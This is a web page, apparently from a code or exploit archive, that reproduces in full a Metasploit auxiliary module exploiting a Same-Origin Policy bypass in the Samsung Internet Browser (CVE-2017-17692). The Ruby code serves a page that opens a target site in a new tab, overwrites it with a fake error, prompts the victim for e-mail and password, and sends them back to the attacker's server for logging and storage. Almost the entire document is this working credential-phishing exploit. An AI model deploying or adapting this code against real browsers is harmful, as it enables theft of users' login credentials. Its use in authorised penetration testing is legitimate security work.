扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Samsung Internet Browser SOP Bypass', 'Description'=> %q( This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up. ), 'License'=> MSF_LICENSE, 'Author' => [ 'Dhiraj Mishra', # Original discovery, disclosure 'Tod Beardsley', # Metasploit module 'Jeffrey Martin' # Metasploit module ], 'References' => [ [ 'CVE', '2017-17692' ], ['URL', 'http://fr.0day.today/exploit/description/28434'] ], 'DisclosureDate' => 'Nov 08 2017', 'Actions'=> [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction'=> 'WebServer' ) ) register_options([ OptString.new('TARGET_URL', [ true, 'The URL to spoof origin from.', 'http://example.com/' ]), OptString.new('CUSTOM_HTML', [ true, 'HTML to display to the victim.', 'This page has moved. Please <a href="https://www.exploit-db.com/exploits/43376/#">click here</a> to redirect your browser.' ]) ]) register_advanced_options([ OptString.new('CUSTOM_JS', [ false, "Custom Javascript to inject as the go() function. Use the variable 'x' to refer to the new tab.", '' ]) ]) end def run exploit # start http server end def evil_javascript return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank? js = <<-EOS setTimeout(function(){ x.document.body.innerHTML='<h1>404 Error</h1>'+ '<p>Oops, something went wrong.</p>'; a=x.prompt('E-mail',''); b=x.prompt('Password',''); var cred=JSON.stringify({'user':a,'pass':b}); var xmlhttp = new XMLHttpRequest; xmlhttp.open('POST', window.location, true); xmlhttp.send(cred); }, 3000); EOS js end def setup @html = <<-EOS <html> <meta charset="UTF-8"> <head> <script> function go(){ try { var x = window.open('#{datastore['TARGET_URL']}'); #{evil_javascript} } catch(e) { } } </script> </head> <body onclick="go()"> #{datastore['CUSTOM_HTML']} </body></html> EOS end def store_cred(username,password) credential_data = { origin_type: :import, module_fullname: self.fullname, filename: 'msfconsole', workspace_id: myworkspace_id, service_name: 'web_service', realm_value: datastore['TARGET_URL'], realm_key: Metasploit::Model::Realm::Key::WILDCARD, private_type: :password, private_data: password, username: username } create_credential(credential_data) end # This assumes the default schema is being used. # If it's not that, it'll just display the collected POST data. def collect_data(request) cred = JSON.parse(request.body) u = cred['user'] p = cred['pass'] if u.blank? || p.blank? print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}") else print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}") store_cred(u,p) end end def on_request_uri(cli, request) case request.method.downcase when 'get' # initial connection print_status("#{cli.peerhost}: Request '#{request.method} #{request.uri}'") print_status("#{cli.peerhost}: Attempting to spoof origin for #{datastore['TARGET_URL']}") send_response(cli, @html) when 'post' # must have fallen for it collect_data(request) else print_error("#{cli.peerhost}: Unhandled method: #{request.method}") end end end |
体验盒子
